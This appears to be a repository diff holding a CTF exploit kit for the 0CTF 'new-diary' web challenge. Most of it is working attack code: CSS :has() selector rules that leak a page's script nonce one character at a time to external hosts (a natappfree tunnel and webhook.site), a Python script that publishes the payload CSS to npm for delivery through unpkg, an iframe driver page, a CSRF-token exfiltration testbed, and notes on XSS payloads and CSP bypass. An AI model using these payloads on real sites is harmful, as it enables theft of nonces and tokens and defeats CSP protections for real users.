+html:has(script[nonce^='9']) {background-image: url(http://qvmrzt.natappfree.cc/leak?q=9)}
+html:has(script[nonce$='a']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=a)}
+html:has(script[nonce$='b']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=b)}
+html:has(script[nonce$='c']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=c)}
+html:has(script[nonce$='d']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=d)}
+html:has(script[nonce$='e']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=e)}
+html:has(script[nonce$='f']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=f)}
+html:has(script[nonce$='g']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=g)}
+html:has(script[nonce$='h']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=h)}
+html:has(script[nonce$='i']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=i)}
+html:has(script[nonce$='j']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=j)}
+html:has(script[nonce$='k']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=k)}
+html:has(script[nonce$='l']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=l)}
+html:has(script[nonce$='m']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=m)}
+html:has(script[nonce$='n']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=n)}
+html:has(script[nonce$='o']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=o)}
+html:has(script[nonce$='p']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=p)}
+html:has(script[nonce$='q']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=q)}
+html:has(script[nonce$='r']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=r)}
+html:has(script[nonce$='s']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=s)}
+html:has(script[nonce$='t']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=t)}
+html:has(script[nonce$='u']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=u)}
+html:has(script[nonce$='v']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=v)}
+html:has(script[nonce$='w']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=w)}
+html:has(script[nonce$='x']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=x)}
+html:has(script[nonce$='y']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=y)}
+html:has(script[nonce$='z']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=z)}
+html:has(script[nonce$='0']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=0)}
+html:has(script[nonce$='1']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=1)}
+html:has(script[nonce$='2']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=2)}
+html:has(script[nonce$='3']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=3)}
+html:has(script[nonce$='4']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=4)}
+html:has(script[nonce$='5']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=5)}
+html:has(script[nonce$='6']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=6)}
+html:has(script[nonce$='7']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=7)}
+html:has(script[nonce$='8']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=8)}
+html:has(script[nonce$='9']) {border-image: url(http://qvmrzt.natappfree.cc/leak?q=9)}

package/npm/2.css ADDED Viewed

	@@ -0,0 +1 @@
1	+ 123

package/npm/__pycache__/npm.cpython-311.pyc ADDED Viewed

Binary file

package/npm/npm.py ADDED Viewed

@@ -0,0 +1,26 @@
+import subprocess
+def npm_upload(index, content):
+    package_json = """{
+        "name": "0ctf",
+        "version": "1.0.""" + str(index) + """",
+        "description": "",
+        "main": "1.css",
+        "license": "ISC"
+    }"""
+    with open(f"package.json", "w") as f:
+        f.write(package_json)
+    with open(f"{index}.css", "w") as f:
+        f.write(content)
+    # 执行npm login
+    command = 'npm publish'
+    result = subprocess.run(command, shell=True, check=True)
+    print(result)
+def main():
+    npm_upload(2, "123")
+if __name__ == "__main__":
+    main()

package/npm/package.json ADDED Viewed

@@ -0,0 +1,7 @@
+{
+        "name": "0ctf",
+        "version": "1.0.1",
+        "description": "",
+        "main": "1.css",
+        "license": "ISC"
+    }

package/package.json ADDED Viewed

@@ -0,0 +1,7 @@
+{
+        "name": "tctf",
+        "version": "1.0.1",
+        "description": "",
+        "main": "1.css",
+        "license": "ISC"
+    }

package/templates/exp.html ADDED Viewed

@@ -0,0 +1,23 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Document</title>
+</head>
+<body>
+    <script>
+        const sleep = ms => new Promise(r => setTimeout(r, ms));
+        const base_url = "http://new-diary.ctf.0ops.sjtu.cn"
+        async function main(username) {
+            var ifr = document.createElement('iframe');
+            ifr.src = `${base_url}/share/read#id=1&username=${username}`;
+            document.body.appendChild(ifr);
+            await sleep(20000);
+            ifr.contentWindow.location = `${base_url}/share/read#id=2&username=${username}`;
+        }
+        const username = "8f88AR";
+        main(username);
+    </script>
+</body>
+</html>

package/test.html ADDED Viewed

@@ -0,0 +1,39 @@
+<!doctype html><meta charset=utf-8>
+<style>
+    textarea, iframe {
+        width:100%;
+        height: 150px;
+    }
+</style>
+<p>This is a testbed for data exfiltration. Enter some HTML below and it will be injected into a page with <code>CSP: script-src 'none'</code>. The goal is to steal <code>csrftoken</code> from the form. The token is different after every reload so you need to steal it all at once!</p>
+<textarea id=input placeholder="HTML here...">
+</textarea><br>
+<button onclick=update()>Update!</button>
+<hr>
+<iframe id=ifr></iframe>
+<script>
+    const token = () => btoa(Array.from(crypto.getRandomValues(new Uint8Array(72)), c => String.fromCharCode(c)).join(''));
+    const input = document.getElementById('input');
+    const html = input => `<!doctype html><meta charset=utf-8>
+    <meta http-equiv=content-security-policy content="script-src 'none'">
+    <form action=#>
+    <input type=hidden name=csrftoken value="${token()}">
+    Name: <input name=name>
+    <button>Submit!</button>
+    ${input}
+    `;
+    document.onkeyup = ev => {
+        if (ev.altKey && ev.keyCode === 13) {
+            update();
+            ev.preventDefault();
+        }
+    };
+    let iframe = document.getElementById('ifr');
+    function update() {
+        iframe.src = `data:text/html,${encodeURIComponent(html(input.value))}`;
+    }
+</script>

package/wsgi.py ADDED Viewed

@@ -0,0 +1,4 @@
+from css import app
+if __name__ == '__main__':
+    app.run()

package//345/210/206/346/236/220 ADDED Viewed

@@ -0,0 +1,67 @@
+<meta http-equiv="refresh" content="30;url=vps">
+<img src onerror=alert(123);>
+<meta http-equiv="Content-Security-Policy" content="script-src 'self' 'unsafe-inline'">
+<img src onerror=alert(123);>
+<meta http-equiv="refresh" content="5;url='javascript:alert(1);'">
+<div id="content"></div>
+<iframe
+    srcdoc="<base href='https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5'><script>alert(1)</script>">
+</iframe>
+<iframe
+  srcdoc="<script nonce=''></script>">
+</iframe>
+<iframe srcdoc="<meta http-equiv='refresh' content='5;url=#id=1&username=askgaka'>"></iframe>
+script-src 'nonce-x9cvsz9f3dto8zj5g5r5k0crzhm9cwdh'; frame-src 'none'; object-src 'none'; base-uri 'self'; style-src 'unsafe-inline' https://unpkg.com
+http://localhost/share/read#id=id&username=username 携带cookie
+生成一个nonce
+然后去请求/share/read/:id接口获取返回值
+插入dom中
+<style>
+    html:has(script[nonce^='a']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=a)}
+    html:has(script[nonce^='b']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=b)}
+    html:has(script[nonce^='c']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=c)}
+    html:has(script[nonce^='d']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=d)}
+    html:has(script[nonce^='e']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=e)}
+    html:has(script[nonce^='f']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=f)}
+    html:has(script[nonce^='g']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=g)}
+    html:has(script[nonce^='h']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=h)}
+    html:has(script[nonce^='i']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=i)}
+    html:has(script[nonce^='j']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=j)}
+    html:has(script[nonce^='k']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=k)}
+    html:has(script[nonce^='l']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=l)}
+    html:has(script[nonce^='m']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=m)}
+    html:has(script[nonce^='n']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=n)}
+    html:has(script[nonce^='o']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=o)}
+    html:has(script[nonce^='p']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=p)}
+    html:has(script[nonce^='q']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=q)}
+    html:has(script[nonce^='r']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=r)}
+    html:has(script[nonce^='s']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=s)}
+    html:has(script[nonce^='t']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=t)}
+    html:has(script[nonce^='u']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=u)}
+    html:has(script[nonce^='v']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=v)}
+    html:has(script[nonce^='w']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=w)}
+    html:has(script[nonce^='x']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=x)}
+    html:has(script[nonce^='y']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=y)}
+    html:has(script[nonce^='z']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=z)}
+    html:has(script[nonce^='0']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=0)}
+    html:has(script[nonce^='1']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=1)}
+    html:has(script[nonce^='2']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=2)}
+    html:has(script[nonce^='3']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=3)}
+    html:has(script[nonce^='4']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=4)}
+    html:has(script[nonce^='5']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=5)}
+    html:has(script[nonce^='6']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=6)}
+    html:has(script[nonce^='7']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=7)}
+    html:has(script[nonce^='8']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=8)}
+    html:has(script[nonce^='9']) {background: url(https://webhook.site/ae630218-c51f-4333-a644-7eb6a194f8d5?q=9)}
+</style>
+https://unpkg.com/tctf@1.0.0/1.css
+unpkg.com/:package@:版本/:文件